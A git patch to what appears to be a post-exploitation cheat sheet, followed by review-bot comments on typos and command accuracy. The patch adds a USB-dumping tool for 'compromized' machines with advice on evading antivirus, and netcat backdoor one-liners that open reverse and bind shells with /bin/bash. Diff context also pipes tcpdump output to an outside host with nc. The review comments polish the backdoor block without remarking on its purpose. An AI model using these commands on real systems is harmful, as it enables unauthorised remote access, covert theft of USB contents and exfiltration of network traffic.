From f5ee21e1e272b387c49e70818d7d5f28f7c6a87e Mon Sep 17 00:00:00 2001 From: tekwizz123 Date: Tue, 28 Jan 2014 19:21:26 +0000 Subject: [PATCH] Initial port of commands over from Google Docs --- bins/windows/index.md | 7 ++++++ scripting/bash.md | 23 +++++++++++++++++-- scripting/powershell.md | 49 ++++++++++++++++++++++++++++++++++++++++- 3 files changed, 76 insertions(+), 3 deletions(-) create mode 100644 bins/windows/index.md diff --git a/bins/windows/index.md b/bins/windows/index.md new file mode 100644 index 0000000..964b81a --- /dev/null +++ b/bins/windows/index.md @@ -0,0 +1,7 @@ +# Useful Windows Binaries + +Useful Windows binary tools that can be used for post exploitation. + +| Tool | Description / Importance | Contributer | +| ----------- | ------------------------ | ----------- | +| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | diff --git a/scripting/bash.md b/scripting/bash.md index 37dd3f3..abf1347 100644 --- a/scripting/bash.md +++ b/scripting/bash.md 
@@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' tcpdump -w - | nc -v 8.8.8.8 9999 ``` -**Recursively search for files within a directory** +**Recursively search for text contained in files within a directory** ```bash zcat -rf ./* | grep "searchstring" ``` +**Recursively search for files with the specified word within them** +*Submitted by cat on Google Fourms* +```bash +ls -a | find | grep -i "string" +``` + +**Netcat backdoor** +*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)* +```bash +nc -e /bin/bash *remotecomputer* *port* +OR +nc -e /bin/bash -lp *port* +``` + +**View CPU Information** +```bash +cat /proc/cpuinfo +``` + Credits ----------- -Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) diff --git a/scripting/powershell.md b/scripting/powershell.md index 94bb7a7..9b655c0 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -83,4 +83,51 @@ tingSystem=*Server*))" |select name` * **Output**: *
**Windows 7:** Show/Hide
name
----
PWNT-DC
Exchange1
-SharePoint1
\ No newline at end of file +SharePoint1 + + ### Get Info About All Connected Drives + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
+ Name : C:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : C:\ + VolumeLabel : HP +
+ Name : D:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : D:\ + VolumeLabel : DATA +
+ Name : E:\ + DriveType : CDRom + DriveFormat : + IsReady : False + AvailableFreeSpace : + TotalFreeSpace : + TotalSize : + RootDirectory : E:\ + VolumeLabel : +
+ + ### Retrieve BIOS Information (including system serial number) + * **Command with arguments**: `gwmi win32_bios` + * **Output**: + *
**Windows 7:** Show/Hide
+ SMBIOSBIOSVersion : 6.0 + Manufacturer : Phoenix Technologies LTD + Name : PheonixBIOS 4.0 Release 6.0 + SerialNumber : XXXXXXXXXXXXXXXXXXXXXX + Version : XXXXXX - XXXXXXX +
+
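Review bot: the new table in bins/windows/index.md gives no source, version or checksum for usbdump.exe, so a reader cannot tell whether the binary they have is the one the description refers to; add where it was obtained and which version was tested, which matters here because the entry itself says the file is flagged by several AV products. Spelling in the same hunk: the column header `Contributer` should be `Contributor`, `compromized` should be `compromised`, and `AV's` should be `AVs`.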
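Review bot: in the scripting/bash.md hunk, the one-liner `ls -a | find | grep -i "string"` under "Recursively search for files with the specified word within them" does not search file contents: `find` ignores its standard input, so the `ls -a` output is discarded, and what reaches `grep` is the list of path names under the current directory, so the command matches file names, not the text inside files. For contents, `grep -ril "string" .` does the recursive, case-insensitive search and lists the matching files; if matching names was the intent, the heading should say so and `find . -iname '*string*'` does that without the pipeline. In the netcat block, the bare line `OR` sits inside the fenced code, so anyone copying the block runs it as a command; split it into two fences or make it a comment (`# or`). Also in this hunk: "Google Fourms" should be "Google Forums", and since the credits line is being edited anyway, "awsome" should be "awesome".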
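Review bot: in the scripting/powershell.md hunk, the sample output for `gwmi win32_bios` spells the product `PheonixBIOS` while the Manufacturer line correctly reads `Phoenix Technologies`; change it to `PhoenixBIOS`. Prefer the full cmdlet name over the alias in documentation, `Get-WmiObject -Class Win32_BIOS`, and add a note that `Get-WmiObject` is not available in PowerShell 6 and later, where `Get-CimInstance -ClassName Win32_BIOS` returns the same information. In the `[System.IO.DriveInfo]::GetDrives()` output, `AvailableFreeSpace`, `TotalFreeSpace` and `TotalSize` all read `111111111111`; mark these as redacted (as the BIOS serial number already is with `XXXX`) or use distinct plausible values so it is clear they are not real output. Good to see the missing trailing newline after `SharePoint1` fixed.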